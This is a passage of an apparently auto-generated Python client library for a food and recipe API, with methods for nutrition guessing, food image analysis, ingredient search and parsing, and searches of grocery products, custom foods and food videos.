raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method guess_nutrition_by_dish_name" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'title' is set
if ('title' not in local_var_params or
local_var_params['title'] is None):
raise ApiValueError("Missing the required parameter `title` when calling `guess_nutrition_by_dish_name`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'title' in local_var_params:
query_params.append(('title', local_var_params['title'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/guessNutrition', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def image_analysis_by_url(self, image_url, **kwargs): # noqa: E501
"""Image Analysis by URL # noqa: E501
Analyze a food image. The API tries to classify the image, guess the nutrition, and find a matching recipes. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.image_analysis_by_url(image_url, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str image_url: The URL of the image to be analyzed. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.image_analysis_by_url_with_http_info(image_url, **kwargs) # noqa: E501
else:
(data) = self.image_analysis_by_url_with_http_info(image_url, **kwargs) # noqa: E501
return data
def image_analysis_by_url_with_http_info(self, image_url, **kwargs): # noqa: E501
"""Image Analysis by URL # noqa: E501
Analyze a food image. The API tries to classify the image, guess the nutrition, and find a matching recipes. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.image_analysis_by_url_with_http_info(image_url, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str image_url: The URL of the image to be analyzed. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['image_url'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method image_analysis_by_url" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'image_url' is set
if ('image_url' not in local_var_params or
local_var_params['image_url'] is None):
raise ApiValueError("Missing the required parameter `image_url` when calling `image_analysis_by_url`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'image_url' in local_var_params:
query_params.append(('imageUrl', local_var_params['image_url'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/images/analyze', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def image_classification_by_url(self, image_url, **kwargs): # noqa: E501
"""Image Classification by URL # noqa: E501
Classify a food image. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.image_classification_by_url(image_url, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str image_url: The URL of the image to be classified. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.image_classification_by_url_with_http_info(image_url, **kwargs) # noqa: E501
else:
(data) = self.image_classification_by_url_with_http_info(image_url, **kwargs) # noqa: E501
return data
def image_classification_by_url_with_http_info(self, image_url, **kwargs): # noqa: E501
"""Image Classification by URL # noqa: E501
Classify a food image. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.image_classification_by_url_with_http_info(image_url, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str image_url: The URL of the image to be classified. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['image_url'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method image_classification_by_url" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'image_url' is set
if ('image_url' not in local_var_params or
local_var_params['image_url'] is None):
raise ApiValueError("Missing the required parameter `image_url` when calling `image_classification_by_url`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'image_url' in local_var_params:
query_params.append(('imageUrl', local_var_params['image_url'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/images/classify', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def ingredient_search(self, query, **kwargs): # noqa: E501
"""Ingredient Search # noqa: E501
Search for simple whole foods (e.g. fruits, vegetables, nuts, grains, meat, fish, dairy etc.). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.ingredient_search(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The partial or full ingredient name. (required)
:param bool add_children: Whether to add children of found foods.
:param float min_protein_percent: The minimum percentage of protein the food must have (between 0 and 100).
:param float max_protein_percent: The maximum percentage of protein the food can have (between 0 and 100).
:param float min_fat_percent: The minimum percentage of fat the food must have (between 0 and 100).
:param float max_fat_percent: The maximum percentage of fat the food can have (between 0 and 100).
:param float min_carbs_percent: The minimum percentage of carbs the food must have (between 0 and 100).
:param float max_carbs_percent: The maximum percentage of carbs the food can have (between 0 and 100).
:param bool meta_information: Whether to return more meta information about the ingredients.
:param str intolerances: A comma-separated list of intolerances. All recipes returned must not contain ingredients that are not suitable for people with the intolerances entered. See a full list of supported intolerances.
:param str sort: The strategy to sort recipes by. See a full list of supported sorting options.
:param str sort_direction: The direction in which to sort. Must be either 'asc' (ascending) or 'desc' (descending).
:param float offset: The number of results to skip (between 0 and 990).
:param float number: The number of expected results (between 1 and 100).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.ingredient_search_with_http_info(query, **kwargs) # noqa: E501
else:
(data) = self.ingredient_search_with_http_info(query, **kwargs) # noqa: E501
return data
def ingredient_search_with_http_info(self, query, **kwargs):  # noqa: E501
    """Ingredient Search  # noqa: E501

    Search for simple whole foods (e.g. fruits, vegetables, nuts,
    grains, meat, fish, dairy etc.). Synchronous by default; pass
    ``async_req=True`` to get back the request thread instead.

    >>> thread = api.ingredient_search_with_http_info(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The partial or full ingredient name. (required)
    :param bool add_children: Whether to add children of found foods.
    :param float min_protein_percent: The minimum percentage of protein the food must have (between 0 and 100).
    :param float max_protein_percent: The maximum percentage of protein the food can have (between 0 and 100).
    :param float min_fat_percent: The minimum percentage of fat the food must have (between 0 and 100).
    :param float max_fat_percent: The maximum percentage of fat the food can have (between 0 and 100).
    :param float min_carbs_percent: The minimum percentage of carbs the food must have (between 0 and 100).
    :param float max_carbs_percent: The maximum percentage of carbs the food can have (between 0 and 100).
    :param bool meta_information: Whether to return more meta information about the ingredients.
    :param str intolerances: A comma-separated list of intolerances the results must be suitable for.
    :param str sort: The strategy to sort recipes by.
    :param str sort_direction: The sort direction, 'asc' or 'desc'.
    :param float offset: The number of results to skip (between 0 and 990).
    :param float number: The number of expected results (between 1 and 100).
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    local_var_params = locals()

    # Endpoint-specific keywords first, then the generic
    # request-control options accepted by every method.
    all_params = [
        'query', 'add_children', 'min_protein_percent',
        'max_protein_percent', 'min_fat_percent', 'max_fat_percent',
        'min_carbs_percent', 'max_carbs_percent', 'meta_information',
        'intolerances', 'sort', 'sort_direction', 'offset', 'number',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    ]

    # Reject unknown keywords; fold known ones into the param dict.
    for arg_name, arg_value in six.iteritems(local_var_params['kwargs']):
        if arg_name not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method ingredient_search" % arg_name
            )
        local_var_params[arg_name] = arg_value
    del local_var_params['kwargs']

    # verify the required parameter 'query' is set
    if local_var_params.get('query') is None:
        raise ApiValueError("Missing the required parameter `query` when calling `ingredient_search`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # Map python_snake_case names to wire-format query keys, keeping
    # only the parameters that were actually supplied.
    _query_names = (
        ('query', 'query'),
        ('add_children', 'addChildren'),
        ('min_protein_percent', 'minProteinPercent'),
        ('max_protein_percent', 'maxProteinPercent'),
        ('min_fat_percent', 'minFatPercent'),
        ('max_fat_percent', 'maxFatPercent'),
        ('min_carbs_percent', 'minCarbsPercent'),
        ('max_carbs_percent', 'maxCarbsPercent'),
        ('meta_information', 'metaInformation'),
        ('intolerances', 'intolerances'),
        ('sort', 'sort'),
        ('sort_direction', 'sortDirection'),
        ('offset', 'offset'),
        ('number', 'number'),
    )
    query_params = [
        (wire_name, local_var_params[py_name])
        for py_name, wire_name in _query_names
        if py_name in local_var_params
    ]

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/food/ingredients/search', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def map_ingredients_to_grocery_products(self, body, **kwargs):  # noqa: E501
    """Map Ingredients to Grocery Products  # noqa: E501

    Map a set of ingredients to products you can buy in the grocery
    store. Synchronous by default; pass ``async_req=True`` to get
    back the request thread instead.

    >>> thread = api.map_ingredients_to_grocery_products(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param object body: (required)
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the deserialized
    # payload, never the (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both forward straight to the
    # *_with_http_info variant, so one return covers both.
    return self.map_ingredients_to_grocery_products_with_http_info(body, **kwargs)  # noqa: E501
def map_ingredients_to_grocery_products_with_http_info(self, body, **kwargs):  # noqa: E501
    """Map Ingredients to Grocery Products  # noqa: E501

    Map a set of ingredients to products you can buy in the grocery
    store. Synchronous by default; pass ``async_req=True`` to get
    back the request thread instead.

    >>> thread = api.map_ingredients_to_grocery_products_with_http_info(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param object body: (required)
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    local_var_params = locals()

    all_params = [
        'body',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    ]

    # Reject unknown keywords; fold known ones into the param dict.
    for arg_name, arg_value in six.iteritems(local_var_params['kwargs']):
        if arg_name not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method map_ingredients_to_grocery_products" % arg_name
            )
        local_var_params[arg_name] = arg_value
    del local_var_params['kwargs']

    # verify the required parameter 'body' is set
    if local_var_params.get('body') is None:
        raise ApiValueError("Missing the required parameter `body` when calling `map_ingredients_to_grocery_products`")  # noqa: E501

    collection_formats = {}
    path_params = {}
    query_params = []
    form_params = []
    local_var_files = {}

    # The request payload is the raw ``body`` argument.
    body_params = local_var_params.get('body')

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/food/ingredients/map', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def parse_ingredients(self, ingredient_list, servings, **kwargs):  # noqa: E501
    """Parse Ingredients  # noqa: E501

    Extract an ingredient from plain text. Synchronous by default;
    pass ``async_req=True`` to get back the request thread instead.

    >>> thread = api.parse_ingredients(ingredient_list, servings, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
    :param float servings: The number of servings that you can make from the ingredients. (required)
    :param bool include_nutrition: Whether nutrition data should be added to correctly parsed ingredients.
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the deserialized
    # payload, never the (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both forward straight to the
    # *_with_http_info variant, so one return covers both.
    return self.parse_ingredients_with_http_info(ingredient_list, servings, **kwargs)  # noqa: E501
def parse_ingredients_with_http_info(self, ingredient_list, servings, **kwargs):  # noqa: E501
    """Parse Ingredients  # noqa: E501

    Extract an ingredient from plain text. Synchronous by default;
    pass ``async_req=True`` to get back the request thread instead.

    >>> thread = api.parse_ingredients_with_http_info(ingredient_list, servings, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
    :param float servings: The number of servings that you can make from the ingredients. (required)
    :param bool include_nutrition: Whether nutrition data should be added to correctly parsed ingredients.
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    local_var_params = locals()

    all_params = [
        'ingredient_list', 'servings', 'include_nutrition',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    ]

    # Reject unknown keywords; fold known ones into the param dict.
    for arg_name, arg_value in six.iteritems(local_var_params['kwargs']):
        if arg_name not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method parse_ingredients" % arg_name
            )
        local_var_params[arg_name] = arg_value
    del local_var_params['kwargs']

    # verify the required parameter 'ingredient_list' is set
    if local_var_params.get('ingredient_list') is None:
        raise ApiValueError("Missing the required parameter `ingredient_list` when calling `parse_ingredients`")  # noqa: E501
    # verify the required parameter 'servings' is set
    if local_var_params.get('servings') is None:
        raise ApiValueError("Missing the required parameter `servings` when calling `parse_ingredients`")  # noqa: E501

    collection_formats = {}
    path_params = {}
    query_params = []
    local_var_files = {}

    # This endpoint takes its inputs as url-encoded form fields; map
    # python_snake_case names to the wire-format field names.
    _form_names = (
        ('ingredient_list', 'ingredientList'),
        ('servings', 'servings'),
        ('include_nutrition', 'includeNutrition'),
    )
    form_params = [
        (wire_name, local_var_params[py_name])
        for py_name, wire_name in _form_names
        if py_name in local_var_params
    ]
    body_params = None

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/x-www-form-urlencoded']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/recipes/parseIngredients', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def quick_answer(self, q, **kwargs):  # noqa: E501
    """Quick Answer  # noqa: E501

    Answer a nutrition related natural language question. Synchronous
    by default; pass ``async_req=True`` to get back the request
    thread instead.

    >>> thread = api.quick_answer(q, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str q: The nutrition related question. (required)
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the deserialized
    # payload, never the (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both forward straight to the
    # *_with_http_info variant, so one return covers both.
    return self.quick_answer_with_http_info(q, **kwargs)  # noqa: E501
def quick_answer_with_http_info(self, q, **kwargs):  # noqa: E501
    """Quick Answer  # noqa: E501

    Answer a nutrition related natural language question. Synchronous
    by default; pass ``async_req=True`` to get back the request
    thread instead.

    >>> thread = api.quick_answer_with_http_info(q, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str q: The nutrition related question. (required)
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    local_var_params = locals()

    all_params = [
        'q',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    ]

    # Reject unknown keywords; fold known ones into the param dict.
    for arg_name, arg_value in six.iteritems(local_var_params['kwargs']):
        if arg_name not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method quick_answer" % arg_name
            )
        local_var_params[arg_name] = arg_value
    del local_var_params['kwargs']

    # verify the required parameter 'q' is set
    if local_var_params.get('q') is None:
        raise ApiValueError("Missing the required parameter `q` when calling `quick_answer`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    query_params = [
        ('q', local_var_params['q']),
    ] if 'q' in local_var_params else []

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/recipes/quickAnswer', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def search_all_food(self, query, **kwargs):  # noqa: E501
    """Search All Food  # noqa: E501

    Search all food content with one call. That includes recipes,
    grocery products, menu items, simple foods (ingredients), and
    food videos. Synchronous by default; pass ``async_req=True`` to
    get back the request thread instead.

    >>> thread = api.search_all_food(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The search query. (required)
    :param float offset: The number of results to skip (between 0 and 990).
    :param float number: The number of expected results (between 1 and 100).
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the deserialized
    # payload, never the (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both forward straight to the
    # *_with_http_info variant, so one return covers both.
    return self.search_all_food_with_http_info(query, **kwargs)  # noqa: E501
def search_all_food_with_http_info(self, query, **kwargs):  # noqa: E501
    """Search All Food  # noqa: E501

    Search all food content with one call. That includes recipes,
    grocery products, menu items, simple foods (ingredients), and
    food videos. Synchronous by default; pass ``async_req=True`` to
    get back the request thread instead.

    >>> thread = api.search_all_food_with_http_info(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The search query. (required)
    :param float offset: The number of results to skip (between 0 and 990).
    :param float number: The number of expected results (between 1 and 100).
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    local_var_params = locals()

    all_params = [
        'query', 'offset', 'number',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    ]

    # Reject unknown keywords; fold known ones into the param dict.
    for arg_name, arg_value in six.iteritems(local_var_params['kwargs']):
        if arg_name not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method search_all_food" % arg_name
            )
        local_var_params[arg_name] = arg_value
    del local_var_params['kwargs']

    # verify the required parameter 'query' is set
    if local_var_params.get('query') is None:
        raise ApiValueError("Missing the required parameter `query` when calling `search_all_food`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # Wire names match the python names for this endpoint; include
    # only the parameters that were actually supplied.
    query_params = [
        (wire_name, local_var_params[wire_name])
        for wire_name in ('query', 'offset', 'number')
        if wire_name in local_var_params
    ]

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/food/search', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def search_custom_foods(self, query, username, hash, **kwargs):  # noqa: E501
    """Search Custom Foods  # noqa: E501

    Search custom foods in a user's account. Synchronous by default;
    pass ``async_req=True`` to get back the request thread instead.

    >>> thread = api.search_custom_foods(query, username, hash, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The search query. (required)
    :param str username: The username. (required)
    :param str hash: The private hash for the username. (required)
    :param float offset: The number of results to skip (between 0 and 990).
    :param float number: The number of expected results (between 1 and 100).
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the deserialized
    # payload, never the (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both forward straight to the
    # *_with_http_info variant, so one return covers both.
    return self.search_custom_foods_with_http_info(query, username, hash, **kwargs)  # noqa: E501
def search_custom_foods_with_http_info(self, query, username, hash, **kwargs):  # noqa: E501
    """Search Custom Foods  # noqa: E501

    Search custom foods in a user's account. Synchronous by default;
    pass ``async_req=True`` to get back the request thread instead.

    >>> thread = api.search_custom_foods_with_http_info(query, username, hash, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The search query. (required)
    :param str username: The username. (required)
    :param str hash: The private hash for the username. (required)
    :param float offset: The number of results to skip (between 0 and 990).
    :param float number: The number of expected results (between 1 and 100).
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    local_var_params = locals()

    all_params = [
        'query', 'username', 'hash', 'offset', 'number',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    ]

    # Reject unknown keywords; fold known ones into the param dict.
    for arg_name, arg_value in six.iteritems(local_var_params['kwargs']):
        if arg_name not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method search_custom_foods" % arg_name
            )
        local_var_params[arg_name] = arg_value
    del local_var_params['kwargs']

    # verify the required parameter 'query' is set
    if local_var_params.get('query') is None:
        raise ApiValueError("Missing the required parameter `query` when calling `search_custom_foods`")  # noqa: E501
    # verify the required parameter 'username' is set
    if local_var_params.get('username') is None:
        raise ApiValueError("Missing the required parameter `username` when calling `search_custom_foods`")  # noqa: E501
    # verify the required parameter 'hash' is set
    if local_var_params.get('hash') is None:
        raise ApiValueError("Missing the required parameter `hash` when calling `search_custom_foods`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # Wire names match the python names for this endpoint; include
    # only the parameters that were actually supplied.
    query_params = [
        (wire_name, local_var_params[wire_name])
        for wire_name in ('query', 'username', 'hash', 'offset', 'number')
        if wire_name in local_var_params
    ]

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/food/customFoods/search', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def search_food_videos(self, query, **kwargs):  # noqa: E501
    """Search Food Videos  # noqa: E501

    Find recipe and other food related videos. Synchronous by
    default; pass ``async_req=True`` to get back the request thread
    instead.

    >>> thread = api.search_food_videos(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The search query. (required)
    :param str type: The type of the recipes.
    :param str cuisine: The cuisine(s) of the recipes, comma separated.
    :param str diet: The diet for which the recipes must be suitable.
    :param str include_ingredients: A comma-separated list of ingredients that the recipes should contain.
    :param str exclude_ingredients: A comma-separated list of ingredients or ingredient types that the recipes must not contain.
    :param float min_length: Minimum video length in seconds.
    :param float max_length: Maximum video length in seconds.
    :param float offset: The number of results to skip (between 0 and 900).
    :param float number: The number of results to return (between 1 and 100).
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always returns just the deserialized
    # payload, never the (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both forward straight to the
    # *_with_http_info variant, so one return covers both.
    return self.search_food_videos_with_http_info(query, **kwargs)  # noqa: E501
def search_food_videos_with_http_info(self, query, **kwargs):  # noqa: E501
    """Search Food Videos  # noqa: E501

    Find recipe and other food related videos. Synchronous by
    default; pass ``async_req=True`` to get back the request thread
    instead.

    >>> thread = api.search_food_videos_with_http_info(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: The search query. (required)
    :param str type: The type of the recipes.
    :param str cuisine: The cuisine(s) of the recipes, comma separated.
    :param str diet: The diet for which the recipes must be suitable.
    :param str include_ingredients: A comma-separated list of ingredients that the recipes should contain.
    :param str exclude_ingredients: A comma-separated list of ingredients or ingredient types that the recipes must not contain.
    :param float min_length: Minimum video length in seconds.
    :param float max_length: Maximum video length in seconds.
    :param float offset: The number of results to skip (between 0 and 900).
    :param float number: The number of results to return (between 1 and 100).
    :return: object
        If the method is called asynchronously,
        returns the request thread.
    """
    local_var_params = locals()

    all_params = [
        'query', 'type', 'cuisine', 'diet', 'include_ingredients',
        'exclude_ingredients', 'min_length', 'max_length', 'offset',
        'number',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    ]

    # Reject unknown keywords; fold known ones into the param dict.
    for arg_name, arg_value in six.iteritems(local_var_params['kwargs']):
        if arg_name not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method search_food_videos" % arg_name
            )
        local_var_params[arg_name] = arg_value
    del local_var_params['kwargs']

    # verify the required parameter 'query' is set
    if local_var_params.get('query') is None:
        raise ApiValueError("Missing the required parameter `query` when calling `search_food_videos`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # Map python_snake_case names to wire-format query keys, keeping
    # only the parameters that were actually supplied.
    _query_names = (
        ('query', 'query'),
        ('type', 'type'),
        ('cuisine', 'cuisine'),
        ('diet', 'diet'),
        ('include_ingredients', 'includeIngredients'),
        ('exclude_ingredients', 'excludeIngredients'),
        ('min_length', 'minLength'),
        ('max_length', 'maxLength'),
        ('offset', 'offset'),
        ('number', 'number'),
    )
    query_params = [
        (wire_name, local_var_params[py_name])
        for py_name, wire_name in _query_names
        if py_name in local_var_params
    ]

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/food/videos/search', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def search_grocery_products(self, query, **kwargs):  # noqa: E501
    """Search Grocery Products  # noqa: E501

    Search packaged food products, such as frozen pizza or Greek
    yogurt. Synchronous by default; pass ``async_req=True`` to get
    back the request thread instead.

    >>> thread = api.search_grocery_products(query, async_req=True)
    >>> result = thread.get()

